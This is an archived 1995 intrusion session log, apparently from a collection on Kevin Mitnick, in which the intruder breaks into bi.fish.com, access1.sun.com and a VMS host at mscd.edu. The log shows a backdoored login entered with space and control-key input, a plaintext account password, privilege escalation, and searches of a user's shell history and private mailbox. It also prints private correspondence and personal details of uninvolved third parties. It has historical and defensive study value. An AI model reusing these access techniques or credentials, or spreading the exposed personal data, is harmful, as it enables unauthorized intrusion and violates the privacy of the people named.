Kevin On Demand
- Soon SATAN Will Find Your Security Holes - kevin-on-demand.takedown.com 4013
- Start: 1995 Feb 10 22:54:16
- Total Run Time: 9:54
- From NETCOM-rtp1.netcom.net to netcom10.netcom.com.
- Kevin breaks into Dan Farmer's machine, fish.com, and peruses his files and mail looking for information about himself, Tsutomu, security holes, and the FBI. Breaks into Sun, confirming that the "access1" in the talk session that afternoon really did refer to access1.sun.com. Kevin also has a fascination with looking through the command histories of system administrators, presumbaly to see if they are on to him.
lib
lost+found
mnt
ncl
pcfs
sbin
scratch
sys
tmp
usr
var
vmunix
teal# ps -aux | grep sendmail
root 96 0.0 0.0 364 56 ? S 08:44 0:33 /usr/lib/sendmail -bd -q
root 1607 0.0 0.3 544 500 ? S 23:53 0:00 /usr/lib/sendmail -bd -q
root 1606 0.0 0.2 376 252 ? S 23:53 0:00 /usr/lib/sendmail -bd -q
root 1615 0.0 0.1 16 184 ? R 23:53 0:00 grep sendmail
root 1256 0.0 0.0 620 600 ? IW 23:44 0:01 /usr/lib/sendmail -bd -q
teal# w tdonahue
11:54pm up 15:12, 22 users, load average: 4.21, 3.82, 3.57
User tty login@ idle JCPU PCPU what
teal# ^D
csn# ^D
Connection closed by foreign host.
$ test1
test1> open bi.fish.com
Trying 140.174.97.1 ...
Connected to bi.fish.com.
Escape character is '^]'.
SunOS UNIX (bi.fish.com)
login:
login names must be >= 3 characters long
login: <SPACE><CR>
login names must be >= 3 characters long
login: <SPACE><CR>
login names must be >= 3 characters long
login: <SPACE><SPACE><SPACE><SPACE><SPACE><SPACE><CR>
Password: ^?^?^?
# /bin/csh
bi.fish.com# ls -lac /bin/login
-rwsr-xr-x 1 root 49152 Feb 10 15:09 /bin/login
bi.fish.com# w
11:00pm up 2 days, 1:04, 9 users, load average: 0.46, 0.09, 0.03
User tty login@ idle JCPU PCPU what
mike console Wed10pm 2days 15:38 15:36 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 2:34 21:36 46 xterm -fn 8x16
mike ttyp1 Wed10pm 21:16 4 4 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 2:45 2 -csh
mike ttyp4 Wed10pm 2days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 23:31 10 -rc
zen ttyp7 Wed11pm 2:38 19:14 7 -bash
mike ttyp9 11:13am 5:30 40 39 -tcsh
muffy ttypa Thu 9am 1:37 15:30 4:33 /usr/openwin/demo/spider
zen ttypb 5:30pm 4:38 23 2 -bash
alyce ttypf 4:25pm 4:01 33 -csh
bi.fish.com# cd /home/zen
bi.fish.com# ls -tla | head
total 6878
drwxr-xr-x 34 zen 7168 Feb 10 20:21 .
-rw------- 1 zen 1015 Feb 10 17:39 .eda07210~
-rw------- 1 zen 6701 Feb 10 17:38 bev
-rw-r--r-- 1 zen 12483 Feb 10 17:30 .bash_history
-rw------- 1 zen 1040319 Feb 10 11:30 muf
-rw-r--r-- 1 zen 225215 Feb 10 09:39 .newsrc.el
-rw------- 1 zen 11431 Feb 10 09:39 .newsrc
drwxr-sr-x 52 tracey 1024 Feb 10 09:12 ..
-rw------- 1 zen 915 Feb 10 09:11 .eda27805~
bi.fish.com# cat .bash_h*
%su
ls
m talk.arch
rm talk.arch
m moria.save
rm moria.save
finger meredith@blue.weeg.uiowa.edu
mail meredith@blue.weeg.uiowa.edu
j
ut
w
j
cush
j
fg
j
telnet sun.com 25
telnet mammoth.cs.berkeley.edu 25
telnet mammoth.berkeley.edu 25
telnet ftp.cs.berkeley.edu 25
j
fg
w
last |m
connections
ut
j
top
pff le0
connections
m /usr/local/src/utils/pff/*.1
m /usr/local/src/utils/pff/pff*
pff i0 |m
pff i0
fg
pff -i0 |m
connections
hostepoch.CS.Berkeley.EDU
fg
w
f
connections
j
pff-net |m
j
ut
w
j
mail muffy
j
cush
mail majordomo@motorcycle.com
j
%-
j
%-
fg
j
df
cd /tmp
du
cd /var/tmp
du
ls
cd /
ls
cd spo
cd usr
ls
df
cd /var
ls
du -s *
df
du /usr/spool/mail/
ls
cd ..
ls
fg
j
ls
du -s dev etc f* lost+found pcfs/ sbin/ tmp/ var
df
du bin
ls
fg
cush
j
fg
j
ut
w
top
ls
ll
df
ls wet
ls wet/tmp/ESa14122
fg
j
cd
cush -u mail
j
fg
j
fg
cush -u mail
fg
which mush
rm bin/mush
cush -u mail
rehahs
rehash
/usr/local/bin/mush -C -u mail
%su
%-
grep -i billyb /usr/local/majordomo/lists/rust*
rust billybob@uclink2.berkeley.edu rust &
fg
vi /usr/local/majordomo/lists/al-stewart
fg
grep -i why /usr/local/majordomo/lists/humans
grep -i why /usr/local/majordomo/lists/humans*
fg
grep -i smith /usr/local/majordomo/lists/humans*
rust chris_smith@unc.edu humans &
fg
grep -i whitea /usr/local/majordomo/lists/bil*
vi /usr/local/majordomo/lists/bil*
fg
fg
echo /usr/local/majordomo/lists/
fg
grep jimwww /usr/local/majordomo/lists/*
vi /usr/local/majordomo/lists/al-stewart
j
fg
grep -i andig /usr/local/majordomo/lists/*
fg
grep -i anddig /usr/local/majordomo/lists/*
vi /usr/local/majordomo/lists/rust
fg
fg
j
cush
/usr/local/bin/mush
j
PATH=$PATH
cush
j
ut
fg
cp /dev/null /usr/spool/mail/mail
j
cush
j
ut
fg
rust Johan.Andersson@ts.umu.se rust&
fg
rust bi573@cleveland.Freenet.Edu humans
fg
rust cbrenski@HRZ.Uni-Bielefeld.DE van-digest&
j
cush
j
ut
j
fg
j
cush
j
ut
w
j
ut
%
rust ebranson@sage.cc.purdue.edu van-digest&
fg
rust abockhor@oucsace.cs.ohiou.edu billy-bragg
fg
j
ut
w
N bi&
k9 %5
setenv DISPLAY blow:0.0
netscape http://bi&
netscape http://bi&
j
cush
j
fg
j
unsetenv DISPLAY
vi .bashrc
. .bashrc
j
gnus
mail lear_p@corp.sgi.com
j
cush
finger ns.rhodes.edu
finger @ns.rhodes.edu
j
%3
j
%-
j
%-
j
ut
%-
grep FAILUR /etc/passwd
grep FAILUR /var/log/syslog
connections
pff-net |m
j
j
fg
j
ut
j
cush
fg
j
ls gifsize.pl
m gifsize.pl
vi gifsize.pl
chmod 755 gifsize.pl
mv gifsize.pl /usr/local/bin
%su
j
%-
telnet ns.rhodes.edu
mr
cush
biff y
cat .llew
host sgigate.sgi.com
cd satan
cd satan.950205
./get_targets sgigate.sgi.com
./get_targets reality.sgi.com
host www.mips.com
host ferrari.SGI.COM
host sgiblab.SGI.COM
host www.SGI.COM
host purgatory.SGI.COM
host insight.SGI.COM
ls
rm core
./tcp_scan 1-1024 192.82.208.254
j
su
ls
ls -t
cd
j
biff
biff y
%-
cush -f wietse
cd satan.950205/
ls *rul*
m rules.ru
mail zen@sgi.com < rules.ru
cd
fg
j
cd ~/satan.950205
ls -t
cat Notes
ls recon*
ls
pushd ../satan.950129/
ls -t
ls *recon*
cd
cd src/me/.old
m bev
mr
p
pp
m *
cd ~/COPS
ls
cd test
ls
ls tmp
cd ..
ls
find . -name "*uucp" -ls
cd perl/uucp
ls
mail zen@sgi.com < uucp.shar
ls stat*
cat stat*
ll /usr/local/src/pw
cd /usr/local/src/pw
cd crack41
ls
ls D*
j
j
%-
mr
cd
mr
cush
m mer
m mer
finger jacobson@blue.weeg.uiowa.edu
grep mer .mailrc
mail -v mer
fg
j
mail -v mer
j
k9 %3
fg
j
%su
j
%-
vi /usr/local/majordomo/lists/billy-bragg
fg
j
m muf
cush -f muf
j
cush
ll .ki* .ca*
cat .cats .kitties
j
exit
mr
cush
biff y
j
fg
j
su
j
cush
fg
ut
w
j
w
connections
j
fg
j
%su
j
%-
%su
j
%-
j
cd src/
ls
cd sun
ls
cd ../logdaemon-4.4/
ls
cd login
ls
j
vi login.c
TERM=xterm
vi login.c
ls
cp login.c login.c.old
fg
ls
vi login.c
make login
j
vi login.c
make login
make login
fg
make login
ls
cd ..
rm login/login
j
%-
j
ls
j
vi login.c
cd ..
make sunos4
j
%su
j
ls
%-
make sunos4
%su
j
%-
ls
grep getpass */*
grep getpass */*.c
cd skey
vi skey_getpass.c
j
%-
pushd ../login
ls
diff login.c login.c.old
popd
j
fg
vi x.c
cc x.c
./a.out
rm core
fg
cc x.c
./a.out
rm core
fg
fg
j
vi ../login/login.c
m /etc/passwd
fg
cd ../login
j
vi login.c
cd ..
make sunos4
fg
j
make sunos4
fg
%su
make sunos4
j
%-
make sunos4
fg
%su
j
%2
j
fg
%5
%4
j
fg
exit
mr
su
biff y
cush
TERM=xterm
cush
cat .mike
j
fg
j
fg
j
cat .mike
j
cush
j
fg
exit
bi.fish.com# ps
PID TT STAT TIME COMMAND
137 cu IW 0:00 /usr/local/etc/sliplogin Slg
10262 p2 IW 0:00 sh
10286 p2 S 0:00 -bin/csh (csh)
10381 p2 R 0:00 ps
1112 p7 TW 0:00 -su (csh)
1113 p7 TW 0:02 bash
7092 pb TW 0:00 -su (csh)
7120 pb TW 0:01 bash
bi.fish.com# w
11:02pm up 2 days, 1:06, 9 users, load average: 0.36, 0.20, 0.01
User tty login@ idle JCPU PCPU what
mike console Wed10pm 2days 15:38 15:36 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 2:37 21:36 46 xterm -fn 8x16
mike ttyp1 Wed10pm 21:19 4 4 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 2:47 2 -csh
mike ttyp4 Wed10pm 2days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 23:34 10 -rc
zen ttyp7 Wed11pm 2:41 19:14 7 -bash
mike ttyp9 11:13am 5:33 40 39 -tcsh
muffy ttypa Thu 9am 1:40 15:31 4:34 /usr/openwin/demo/spider
zen ttypb 5:30pm 4:41 23 2 -bash
alyce ttypf 4:25pm 4:03 33 -csh
bi.fish.com# cd /usr/spool/mail
bi.fish.com# ls -tla zen
-rw------- 1 zen 952740 Feb 10 22:59 zen
bi.fish.com# grep -i tsut zen
> *smile* Tsutomu in the news.... *smile*...
bi.fish.com# grep -i hacker zen
Organization: fine internet security hackers
Rebellious Human Intelligence, Gratifying Hackers, Wiseasses, And Yahoos.
bi.fish.com# grep -i fbi zen
The FBI also is looking into the matter to determine whether it violates
MH"\@IMM0H.?+_42D^*ZWW"Y";-<?*;/K5](;8+FBI%Y;$6;%0D<>IHWD29VF
MG)++BN),!G(U&>Q)_DDL7$](Y9YC$3+8..Z.=BO)FBI2G@TL*4L[EE@:F21#
bi.fish.com# grep -i itni zern
grep: zern: No such file or directory
bi.fish.com# grep -i itni zen
bi.fish.com# cd /var/log/sudo
/var/log/sudo: No such file or directory
bi.fish.com# ls t-la
t-la not found
bi.fish.com# ls -tla
total 24040
-rw-rw-rw- 1 root 24176419 Feb 10 23:03 syslog
-rw-r--r-- 1 root 189249 Feb 10 04:41 arclog
drwxrwsr-x 3 news 512 Feb 10 04:28 news
-rw-r--r-- 1 root 28203 Feb 8 23:49 syslog.3
drwxr-xr-x 3 root 512 Feb 8 23:47 .
-rwxr-xr-x 1 root 39 Feb 8 23:39 strip-log
-rw-r--r-- 1 root 16294 Feb 7 00:32 syslog.4
-rw-r--r-- 1 root 770 Feb 7 00:30 syslog.5
-rw-r--r-- 1 root 89092 Feb 7 00:30 syslog.6
-rw-r--r-- 1 root 5368 Dec 21 09:18 syslog.7.Z
-rw-r--r-- 1 root 32190 Dec 8 14:57 syslog.8.Z
-rw-r--r-- 1 root 23052 Dec 8 14:57 syslog.9.Z
drwxr-xr-x 3 root 512 Nov 29 14:29 ..
-rw------- 1 root 144 Nov 5 10:35 httpd-errors
-rw------- 1 root 0 Nov 5 10:32 httpd-log
-rw-r--r-- 1 root 697 Oct 14 01:19 primus.fuckyou
bi.fish.com# cat strip*
egrep -v 'sendmail|innd|nnrpd|cron' $1
bi.fish.com# w
11:03pm up 2 days, 1:08, 9 users, load average: 0.16, 0.17, 0.00
User tty login@ idle JCPU PCPU what
mike console Wed10pm 2days 15:39 15:37 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 2:38 21:36 46 xterm -fn 8x16
mike ttyp1 Wed10pm 21:20 4 4 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 2:48 2 -csh
mike ttyp4 Wed10pm 2days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 23:35 10 -rc
zen ttyp7 Wed11pm 2:42 19:14 7 -bash
mike ttyp9 11:13am 5:34 40 39 -tcsh
muffy ttypa Thu 9am 1:41 15:32 4:35 /usr/openwin/demo/spider
zen ttypb 5:30pm 4:42 23 2 -bash
alyce ttypf 4:25pm 4:05 33 -csh
bi.fish.com# cd /home/zen
bi.fish.com# ls -tla | head -50
total 6878
drwxr-xr-x 34 zen 7168 Feb 10 20:21 .
-rw------- 1 zen 1015 Feb 10 17:39 .eda07210~
-rw------- 1 zen 6701 Feb 10 17:38 bev
-rw-r--r-- 1 zen 12483 Feb 10 17:30 .bash_history
-rw------- 1 zen 1040319 Feb 10 11:30 muf
-rw-r--r-- 1 zen 225215 Feb 10 09:39 .newsrc.el
-rw------- 1 zen 11431 Feb 10 09:39 .newsrc
drwxr-sr-x 52 tracey 1024 Feb 10 09:12 ..
-rw------- 1 zen 915 Feb 10 09:11 .eda27805~
-rw------- 1 zen 89725 Feb 10 08:58 lefty
drwxr-xr-x 11 zen 512 Feb 10 00:08 tmp
-rw-rw-rw- 1 zen 6757 Feb 9 23:56 .MCOM-global-history
-rw------- 1 zen 3715 Feb 9 23:49 .eda21844~
-rw------- 1 zen 34147 Feb 9 23:42 kirsten
-rw-r--r-- 1 zen 7235 Feb 9 22:36 .bashrc
-rw------- 1 zen 319 Feb 9 16:31 .eda16098~
drwx------ 6 zen 1536 Feb 9 11:18 satan.950205
drwxr-xr-x 2 zen 2048 Feb 9 08:40 bin
-rw------- 1 zen 157 Feb 9 02:52 .eda04208~
-rw------- 1 zen 43 Feb 8 23:56 .eda01472~
-rw------- 1 zen 179 Feb 8 23:53 .swatchrc
drwx------ 13 zen 1024 Feb 8 21:18 security
-rw------- 1 zen 906 Feb 8 19:57 .tsu
-rw------- 1 zen 1196 Feb 8 12:10 .eda27659~
-rw------- 1 zen 1068 Feb 8 10:41 lizzie
-rw------- 1 zen 371 Feb 8 04:53 .eda23668~
-rw------- 1 zen 32820 Feb 7 21:05 .eda18733~
-rw------- 1 zen 749 Feb 7 17:02 .mike
-rw------- 1 zen 758 Feb 7 16:55 .eda14695~
-rw------- 1 zen 302 Feb 7 14:44 .eda13420~
drwx------ 5 zen 512 Feb 7 10:35 Mail
-rw------- 1 zen 15960 Feb 7 08:44 Undel.mail
-rw------- 1 zen 254 Feb 7 08:27 .eda06537~
-rw------- 1 zen 11431 Feb 7 08:08 .newsrc~
-rw------- 1 zen 21618 Feb 7 07:51 tsu
-rw------- 1 zen 2694 Feb 7 07:39 .eda05986~
drwx------ 2 zen 512 Feb 7 01:46 SGI
-rw------- 1 zen 132 Feb 7 00:41 test
-rw-r--r-- 1 zen 11031 Feb 6 14:52 pubring.pgp
drwxr-xr-x 26 zen 512 Feb 6 00:55 src
-rw------- 1 zen 91 Feb 5 12:11 .MCOM-HTTP-cookie-file
-rw------- 1 zen 37618 Feb 5 11:26 .mosaic-global-history
-rw------- 1 zen 1550 Feb 5 11:26 .mosaic-hotlist-default
-rw------- 1 zen 5 Feb 5 11:25 .mosaicpid
-rw------- 1 zen 1298 Feb 5 11:19 .MCOM-preferences
drwxr-xr-x 16 zen 1024 Feb 5 10:44 dan
-rw------- 1 zen 2869 Feb 4 22:02 robin
-rw------- 1 zen 32863 Feb 4 19:15 nuala
-rw------- 1 zen 823 Feb 4 19:08 .MCOM-bookmarks.html
bi.fish.com# /usr/etc/ifconfig le0
le0: flags=63<UP,BROADCAST,NOTRAILERS,RUNNING>
inet 140.174.97.1 netmask ffffff80 broadcast 140.174.97.0
ether 8:0:20:11:d2:99
bi.fish.com# grep -i tsu muf
Subject: http://www.netsurf.com/nsm/v01/01/airspace/startrek.txt
X-Url: http://www.netsurf.com/nsm/v01/01/airspace/startrek.txt
by AT&T researchers, was detailed in a talk given by Tsutomu
bi.fish.com# grep -i itni muf
bi.fish.com# grep -i fbi muf
Democrats, and he also called for a joint FBI/NEA investigation to
FBI computer crime expert who is now an executive at Inet Corp., a
"The University contacted the FBI after it identified the student
FBI Special Agent Gregory Stejskal of the bureau's Ann Arbor office.
Subject: Jake Baker arrested by FBI 2/09
Jake Baker was arrested by the FBI yesterday, and is being held without
bond, as he is being considered a threat to society. The FBI arrested
bi.fish.com# more muf
From muffy Wed Nov 30 13:55:03 1994
Received: (from muffy@localhost) by bi.fish.com (8.9.1 (Alpha)/1.0.23) id NAA15927; Wed, 30 Nov 1994 13:55:01 -0800
Date: Wed, 30 Nov 1994 13:55:01 -0800
From: Muffy <muffy>
Message-Id: <199411302155.NAA15927@bi.fish.com>
To: zen@bi.fish.com
In-reply-to: zen@bi.fish.com's message of Wed, 30 Nov 1994 13:50:29 -0800 <199411302150.NAA15886@bi.fish.com>
Subject: Re: Problems Making Same-Sex Friends
Organization: Vicious Fishes
X-Meaningful-Quote: Oh, wow, look at the moon.
Status: ORr
> > Is this the person that wrote that poem to you?
> The same... guess she is leaping into the fray now, eh?
Yup...probably wants you to notice her...*grin*....check out her home
page...
Muffy
/FBI
...skipping
Rep. Gingrich said that subpoenas were being prepared for the accused
Democrats, and he also called for a joint FBI/NEA investigation to
identify the persons who taught them how to masturbate, and to determine
whether federal funds were involved.
The White House press office responded in a prepared statement. In it
the President dismissed the allegations of Rep. Gingrich: "Our staff
members must pass very stiff credential checks. If I became aware of
moral depravity in any of these individuals, I would personally see to
it that they were yanked." The President was also quoted as saying "I
tried masturbation once during my youth, but I did not climax."
[original]
--
Julian Vrieslander
jdv@netcom.com jdv2@cornell.edu
--
Selected by Maddi Hausmann Sojourner. MAIL your joke to funny@clarinet.com.
Attribute the joke's source if at all possible. A Daemon will auto-reply.
/
...skipping
and hardware security mechanisms.
``This was a sophisticated attack,'' said James Settle, a former
FBI computer crime expert who is now an executive at Inet Corp., a
computer security firm. ``Essentially everyone is vulnerable.''
The Internet works by breaking computer messages in groups of
digital packets of data, each of which has an electronic
'`envelope'' that provides ``to'' and ``from'' addressing
information used by special network computers known as routers that
deliver the data.
The new attack makes uses of a flaw in the design of the network
to fool the router computers into believing that a message is
coming from a trusted source. By masquerading as a familiar
computer, an attacker can gain access to protected computer
resources and seize control of an otherwise well-defended system.
Computer administrators at several organizations that have been
broken into by individuals using the technique said they had been
contacted by federal law enforcement officials as part of an
investigation into the break-ins, but Justice Department officials
rrefused to comment.
The lack of tight security on the Internet has remained a
well-known risk, even as thousands of companies have been flocking
/
...skipping
native's troubles.
"The University contacted the FBI after it identified the student
putting the snuff stories on the Internet, and we are looking at
whether there was a violation of the federal obscenity statute," said
FBI Special Agent Gregory Stejskal of the bureau's Ann Arbor office.
"We're looking into the possibility of charging him with distribution
of obscene material."
Congress recently added computer trafficking to pornography laws, and
Stejskal said this case is a new wrinkle in policing the rapidly
growing worldwide network of computer systems. Violation of the law is
a felony that carries a penalty of up to five years in prison.
"If its not the first," Stejskal said, "it's gotta be close to being
the first case under it."
END STORY
****Ignore All Below This Line*****
/
...skipping
To: zen
In-reply-to: Andy Lesko's message of 10 Feb 1995 14:46:11 GMT
Subject: Jake Baker arrested by FBI 2/09
Organization: Vicious Fishes
X-Meaningful-Quote: Oh, wow, look at the moon.
Status: OR
Can you find the article about this on clarinet?
Muffy
Path: bi.fish.com!sgiblab!swrinde!howland.reston.ans.net!agate!newsxfer.itd.umich.edu!lsa.umich.edu!usenet
From: Andy Lesko <andres.lesko@um.cc.umich.edu>
Newsgroups: alt.sex.stories
Date: 10 Feb 1995 14:46:11 GMT
Organization: Univ. of Michigan
Lines: 5
Distribution: world
NNTP-Posting-Host: 141.212.190.199
X-UserAgent: Version 1.1.3
X-XXDate: Fri, 10 Feb 95 09:50:50 GMT
Jake Baker was arrested by the FBI yesterday, and is being held without
bond, as he is being considered a threat to society. The FBI arrested
him after investigating his email, where he described (to some guy in
Canada) his "plans" to assault some girl who lives near his room. I
don't have time to post the whole story.
From muffy@informix.com Fri Feb 10 10:36:03 1995
Received: from gateway.informix.com (gateway.informix.com [192.216.240.3]) by bi.fish.com (8.9.1 (Alpha)/1.0.23) with SMTP id KAA29360 for <zen@fish.com>; Fri, 10 Feb 1995 10:35:57 -0800
Received: from informix.com (infmx.informix.com) by gateway.informix.com (4.1/SMI-4.1)
id AA28653; Fri, 10 Feb 95 10:31:00 PST
Received: from death.informix.com by informix.com (4.1/SMI-4.1)
id AA02416; Fri, 10 Feb 95 10:30:52 PST
Received: by death.informix.com (5.0/SMI-SVR4)
id AA22866; Fri, 10 Feb 1995 10:31:18 +0800
Date: Fri, 10 Feb 1995 10:31:18 +0800
Message-Id: <9502101831.AA22866@death.informix.com>
q
bi.fish.com# w
11:06pm up 2 days, 1:10, 9 users, load average: 0.33, 0.30, 0.03
User tty login@ idle JCPU PCPU what
mike console Wed10pm 2days 15:39 15:37 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 2:40 21:36 46 xterm -fn 8x16
mike ttyp1 Wed10pm 21:23 4 4 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 2:51 2 -csh
mike ttyp4 Wed10pm 2days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 23:38 10 -rc
zen ttyp7 Wed11pm 2:45 19:14 7 -bash
mike ttyp9 11:13am 5:37 40 39 -tcsh
muffy ttypa Thu 9am 1:43 15:33 4:36 /usr/openwin/demo/spider
zen ttypb 5:30pm 4:45 23 2 -bash
alyce ttypf 4:25pm 4:07 33 -csh
bi.fish.com# cd security
bi.fish.com# ls -tla
total 427
drwxr-xr-x 34 zen 7168 Feb 10 20:21 ..
drwx------ 13 zen 1024 Feb 8 21:18 .
drwx------ 2 zen 512 Jan 12 01:08 X
-rw------- 1 zen 70580 Jan 7 18:59 FAQ
-rw------- 1 zen 2083 Jan 7 18:57 cgi-secuirty
drwx------ 2 zen 512 Jan 6 01:50 sun
-rw------- 1 zen 8562 Dec 30 08:14 source-routing
-rw------- 1 zen 1911 Dec 22 20:17 nfs
drwx------ 2 zen 512 Dec 21 12:11 hp
-rw------- 1 zen 9068 Dec 19 07:51 misc.foo
drwx------ 2 zen 512 Dec 19 07:50 race-conditions
-rw------- 1 zen 3394 Dec 19 07:50 emacs-bomb
drwx------ 2 zen 512 Dec 18 22:18 packets
drwx------ 2 zen 512 Dec 10 16:58 sgi
-rw------- 1 zen 2351 Dec 10 15:06 code-review
-rw------- 1 zen 30483 Dec 5 19:07 firewall-faq
drwx------ 2 zen 512 Dec 5 10:55 bugtraq
-rw------- 1 zen 2091 Dec 2 15:07 dec-tales
drwx------ 2 zen 512 Dec 1 16:33 firewalls
drwx------ 2 zen 512 Nov 29 13:57 8lgm
-rw------- 1 zen 13188 Nov 21 08:03 x-security
drwxrwxrwx 13 root 512 Nov 17 21:54 firewall
-rw------- 1 zen 11608 Nov 13 03:18 solaris-23.uu
-rw------- 1 zen 4868 Nov 13 03:10 news.hacking
-rw------- 1 zen 2159 Nov 10 14:48 IP-Forwarding
-rw------- 1 zen 45317 Nov 10 12:50 solaris-1.1.bugs
-rw------- 1 zen 27352 Nov 10 12:50 solaris-1.1.1.bugs
-rw------- 1 zen 28482 Nov 10 12:50 solaris-2.2.bugs
-rw------- 1 zen 38409 Nov 10 12:49 solaris-2.3.bugs
-rw------- 1 zen 15645 Nov 10 01:44 cdrom
-rw------- 1 zen 2159 Nov 9 12:07 lore
drwx------ 2 zen 512 Oct 17 16:37 btraq
-rw------- 1 zen 1456 Jul 11 1994 bugs
-rw------- 1 zen 2413 Jun 16 1994 packet_filtering
-rw------- 1 zen 17495 Jun 16 1994 security_info
-rw------- 1 zen 9234 Jun 16 1994 anonymous_ftp
-rw------- 1 zen 11964 Mar 15 1994 vendors.1.3
-rw------- 1 zen 10056 Mar 11 1994 vendors.1.1
-rw------- 1 zen 31708 Mar 11 1994 cert.hp
bi.fish.com# cd /usr/spool/mail
bi.fish.com# grep -i hole zen
> last week, the whole story with her record company, etc., and have a
One of my favorite memories from the whole experience (not important, but
perspective. However, I can't help but believe that, as far as the whole earth
the Phoenix Hotel, funky Tenderloin swim ming hole for mods and rockers. The
More to the point, they eat a whole lot of bugs. According to recent studies, a
>: Which brings up the whole problem of "Janglish," those horribly poor
the whole system, and for very large systems you can't do this without a
*HUG*...I'm sorry, love...I had your phone turned on the whole time; I
We talked about this whole security thing again last night. I think I
the whole point of that weekend is that I do not have to be responsible to
> We talked about this whole security thing again last night. I think I
just as easily, but, since Don posts, I only have his thoughts to poke holes
> > We talked about this whole security thing again last night. I think I
resembling a whole person. I am simply not that altruistic or martyrish.
Even if Precious truly felt it was over, it would not be the whole fix.
> just as easily, but, since Don posts, I only have his thoughts to poke holes
called 'Out of the Blue (Into the Fire)', and the whole of 'Dusk' was
9-Live Through This HOLE
Some of the above selections represent one pick out of the artists whole
from the album, never the whole thing intact. Anyone heard this?
SOON SATAN WILL FIND YOUR SECURITY HOLES
security holes if your network
to analyze networks outside and fine security holes.
Satan proceeds from all known security holes, and looks
of addons to cover the security holes that is being discovered.
and being able to find many security holes.
bi.fish.com# grep -i bug zen
Received: from bedbugs.net.ohio-state.edu (bedbugs.net.ohio-state.edu [128.146.222.2]) by locust.net.ohio-state.edu (8.6.9/8.6.9) with ESMTP id MAA11150 for <zen@bi.fish.com>; Tue, 3 Jan 1995 12:54:51 -0500
Received: (from romig@localhost) by bedbugs.net.ohio-state.edu (8.6.9/8.6.9) id MAA08465; Tue, 3 Jan 1995 12:54:51 -0500
Message-Id: <199501031754.MAA08465@bedbugs.net.ohio-state.edu>
Sorry to bug you, but this should take care of my pending stuff...
A Big BAH HUMBUG from jbay@io.com (jbay)
I have not got 'the bug' for Braggers in any way like I used to but still
> extra year to debug Windows and get it shipped for what will be the
bats to fight bugs
benefits a farmer's bottom line: They eat bugs.
More to the point, they eat a whole lot of bugs. According to recent studies, a
about 250 tons of bugs a night.
other pests, including corn borers, leafhoppers, stink bugs, cucumber beetles
``Especially Jerusalem crickets, which are really huge bugs,'' Graves said. ``I
>*The packing paper has printed the bug picture, which can be cut as per
"We don't bug fix, either..."
Subject: "We don't bug fix, either..."
If Sun numbers their bug reports sequentially, this is funnier
>has the old sendmail bug (telnet to port 7002 for some fun); I
Which bug, the "bounce through a Errors-To:" one, or older than that ?
bi.fish.com# ^D
# ^D
Connection closed by foreign host.
$ test1
test1> open access1.sun.com
Trying 192.9.9.15 ...
Connected to access1.sun.com.
Escape character is '^]'.
SunOS UNIX (access1)
login: <SPACE>
Password: ^Faccess1
# /bin/csh
access1# w
10:58pm up 84 days, 18:19, 4 users, load average: 0.00, 0.00, 0.00
User tty login@ idle JCPU PCPU what
cmpvuk ttyp0 Wed 5am 15:09 29 10 /home1/sso/bin/docsearch_ui
CrayRSS ttyp1 3:58pm 6:23 38 1 /home1/sso/bin/docsearch_ui
demiroot ttyp3 9:24am 10:13 more patch2html
skriverv ttyp4 Thu 9am 2days /home1/sso/bin/docsearch_ui
access1# ps
PID TT STAT TIME COMMAND
10231 p2 S < 0:00 sh
10232 p2 S < 0:00 -bin/csh (csh)
10234 p2 R < 0:00 ps
9050 p3 IW 0:00 -csh (csh)
9630 p3 IW 0:00 more patch2html
access1# w
10:58pm up 84 days, 18:19, 4 users, load average: 0.00, 0.00, 0.00
User tty login@ idle JCPU PCPU what
cmpvuk ttyp0 Wed 5am 15:09 29 10 /home1/sso/bin/docsearch_ui
CrayRSS ttyp1 3:58pm 6:23 38 1 /home1/sso/bin/docsearch_ui
demiroot ttyp3 9:24am 10:13 more patch2html
skriverv ttyp4 Thu 9am 2days /home1/sso/bin/docsearch_ui
access1# ping elmer
ping: Command not found.
access1# ^D
# ^D
Connection closed by foreign host.
$ test1
test1> open maddog.queernet.org
Trying 140.174.78.2 ...
^C
test1> open mscd.edu
Trying 147.153.1.2 ...
Connected to mscd.edu.
Escape character is '^]'.
Username: RJESYSTEM/NOCOMM
Password: fucknmc
Welcome to System 2, node ZENO, VAX 6310, VMS 5.5-2
Metropolitan State College of Denver, Information Technology
By logging into this system you agree to both the spirit and letter of
MSCD's appropriate use statement. A copy of this is available in WC246
Unauthorized access to this system is prohibited.
C++ Compiler Installed On The VAX
The DEC C++ compiler is available for your use on the VAX. To run
the compiler the command is CXX at the dollar prompt. To access the
on-line help the command is: $ HELP CXX
ATTENTION CMS MAJORS! Applicant deadline for the Colorado Scholars
Awards is Friday, March 3, 1995. Application forms (yellow) available
in the CMS office. Contact Gerry Morris at 556-2175 or VAXmail (Morris)
if you have any questions.
ATTENTION VAX AND HP USERS
The VAX and HP will be INOPERATIVE on SUNDAY 2/12, 9 a.m. - 1 p.m. for
maintenance. Please spread the word.
Last interactive login on Friday, 10-FEB-1995 23:19
Last non-interactive login on Friday, 10-FEB-1995 07:16
**NOTE** Interactive limits are set down.
You are logging into your SYSTEM account, 11-FEB-1995 00:04:55.50
^?
Interrupt
$ set proc/priv=all